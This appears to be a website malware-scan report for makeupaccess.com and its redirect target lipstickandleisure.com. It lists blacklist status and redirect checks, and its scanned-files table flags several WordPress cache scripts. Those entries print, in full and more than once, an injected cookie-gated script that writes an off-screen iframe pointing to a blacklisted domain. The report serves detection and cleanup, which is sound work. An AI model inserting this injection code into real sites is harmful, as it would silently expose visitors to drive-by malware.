Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=makeupaccess.com
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious; visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nsscoaching.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Jul 2013 18:19:32 GMT
Accept-Ranges: bytes
ETag: "211f5-e73-4e1eb47d00d21"
Server: nginx/1.5.2
Content-Length: 3699
Content-Type: text/html
Last-Modified: Sat, 20 Jul 2013 06:09:05 GMT
...3699 bytes of data.
GET / HTTP/1.1
Host: nsscoaching.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 20 Jul 2013 18:19:32 GMT
Accept-Ranges: bytes
ETag: "211f5-e73-4e1eb47d00d21"
Server: nginx/1.5.2
Content-Length: 3699
Content-Type: text/html
Last-Modified: Sat, 20 Jul 2013 06:09:05 GMT
...3699 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: nsscoaching.com
Referer: http://www.google.com/search?q=nsscoaching.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nsscoaching.com
Referer: http://www.google.com/search?q=nsscoaching.com
Result:
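The result is similar to the first query. There are no suspicious redirects found. Note: the requests shown in this section were sent to nsscoaching.com in July 2013, whereas the Safe Browsing query above and the scanned-pages table below concern makeupaccess.com, scanned in September 2014, where a 301 redirect to lipstickandleisure.com is recorded and flagged; this result should therefore not be read as covering the scanned site.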
Scanned pages/files
Request | Server response | Status |
http://www.makeupaccess.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Sep 2014 09:26:45 GMT Location: http://lipstickandleisure.com/ Server: Apache Content-Length: 308 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://lipstickandleisure.com/ | 200 OK Content-Length: 104262 Content-Type: text/html | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/fc1JDoAgDAXQCzHEcCIglUEZZIji6Y0Rduqq_6d9KaN2q5AaYj1gZ1TiBYgzHk0067ALc46J41qV8XTmXjYRjo7I6CRyuXwzmwcoGhzE6qUmzy7_P3yV_SamcOML.js | 200 OK Content-Length: 140502 Content-Type: text/javascript | malicious |
Page code contains blacklisted domain: diglamuin.brendaberstein.com.ar ...[109 bytes skipped]... ires*1000);document.cookie=name+'='+value+'; path=/; expires='+date.toUTCString();} function Ursilifer(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,'\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} var cookie=Ursilifer('karater7una8ue');if(cookie==undefined){setCookie('karater7una8ue',true,259201);document.write('<iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');}} Vuelingflytersku(); /* jQuery v1.11.0 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */ !function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof win ...[3015 bytes skipped]... Malicious iFrame found. size: 135x135 src: http://diglamuin.brendaberstein.com.ar/traulperas16.khml This URL is marked by Google as suspicious <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"> | ||
http://lipstickandleisure.com/wp-content/cache/minify/000000/XYxBDoMwDAQ_VDtE6n-q1BgwMkmIHVX8vlJQL73Ozk4M-9m5XVAlgzi8u3vJsJQGcqSVLewWjJpUx0PyYwozq1ByHkOv3Bax7Y_fTaSLlDGpjmsMtZgbUGqlGyt8ZF7Zh_9jKs6viBNGen4B.js | 200 OK Content-Length: 20775 Content-Type: text/javascript | malicious |
Page code contains blacklisted domain: diglamuin.brendaberstein.com.ar ...[109 bytes skipped]... ires*1000);document.cookie=name+'='+value+'; path=/; expires='+date.toUTCString();} function Ursilifer(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,'\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} var cookie=Ursilifer('karater7una8ue');if(cookie==undefined){setCookie('karater7una8ue',true,259201);document.write('<iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');}} Vuelingflytersku();(function(e){"use strict";window.jpibfi=function(){function a(t){var n=jQuery("<a/>",{href:"#","class":"pinit-button","data-jpibfi-indexer":t,text:""});n.click(function(t){h("Pin In button clicked");var n=e(this).data("jpibfi-indexer");var r=e('img[data-jpibfi-indexer="'+n+'"]');var i="",s="",o="";if(u.settings.usePostUrl){var ...[3078 bytes skipped]... Malicious iFrame found. size: 135x135 src: http://diglamuin.brendaberstein.com.ar/traulperas16.khml This URL is marked by Google as suspicious <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"> | ||
https://wprp.zemanta.com/static/js/loader.js?version=3.5.1 | 200 OK Content-Length: 11783 Content-Type: application/javascript | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/M9BPSc3JTE4sSdVPK81LLsnMzyvWzyrWL87ILypJzk9JBQA.js | 200 OK Content-Length: 692 Content-Type: text/javascript | malicious |
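Malicious code found. Script contains blacklisted domain: diglamuin.brendaberstein.com.ar function Vuelingflytersku(){function setCookie(name,value,expires){var date=new Date(new Date().getTime()+expires*1000);document.cookie=name+'='+value+'; path=/; expires='+date.toUTCString();} function Ursilifer(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,'\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;} var cookie=Ursilifer('karater7una8ue');if(cookie==undefined){setCookie('karater7una8ue',true,259201);document.write('<iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe>');}} Vuelingflytersku(); Decoded script: <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"></iframe> Malicious iFrame found. size: 135x135 src: http://diglamuin.brendaberstein.com.ar/traulperas16.khml This URL is marked by Google as suspicious <iframe src="http://diglamuin.brendaberstein.com.ar/traulperas16.khml" style="top:-998px;left:-998px;position:absolute;" height="135" width="135"> Why this is flagged: the script writes the iframe only when the cookie karater7una8ue is absent and then sets that cookie with a lifetime of 259201 seconds (about three days), so a given browser receives the iframe once per period and a repeat visit in the same browser will not show it; the 135x135 iframe is absolutely positioned at -998px from the top and left, which places it off-screen. The same function appears at the start of the other flagged files under /wp-content/cache/minify/ in this table, ahead of otherwise ordinary library code, so the injection presumably sits in the cached bundles or in the scripts they are built from; both should be checked when cleaning the site. | ||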
http://www.makeupaccess.com//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 27 Sep 2014 09:26:52 GMT Location: http://lipstickandleisure.com/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Content-Length: 348 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://lipstickandleisure.com/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 32636 Content-Type: text/html | clean |
http://lipstickandleisure.com//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 27 Sep 2014 09:26:54 GMT Pragma: no-cache Location: http://lipstickandleisure.com/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://lipstickandleisure.com/xmlrpc.php | clean |
http://lipstickandleisure.com/test404page.js | 404 Not Found Content-Length: 32636 Content-Type: text/html | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/dcvRCoAgDEDRHwp98Is0x1ioq7kR9fXRY7Be7-GmaBS3w0CuYBRWFgidxpK-_aSKoJ50tukuApPuXJqLVTLiHxZT5eHJzpOUfKuUG-MrDw.js | 200 OK Content-Length: 51599 Content-Type: text/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201439 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/hczBDYAgEAXRhtQNRVjIRn4QxAVZkNi9Hrwaz5M3hgJq5mWjPdkWodSzK2lNg6F-qQ88CrpG1IqiFJROjt5yBUUW19g9JBwN5Zre4pPM4rxghPxfPuwN.js | 200 OK Content-Length: 83933 Content-Type: text/javascript | clean |
http://lipstickandleisure.com/wp-content/cache/minify/000000/M9QvryzOzErUzUstL85JLSlJLSrWzyrWTyvKzyvRLS5NKk4uykwCCgIA.js | 200 OK Content-Length: 3863 Content-Type: text/javascript | clean |
http://stats.wordpress.com/e-201439.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://lipstickandleisure.com/category/beauty/ | 200 OK Content-Length: 95772 Content-Type: text/html | clean |
http://lipstickandleisure.com/category/decor/ | 200 OK Content-Length: 73635 Content-Type: text/html | clean |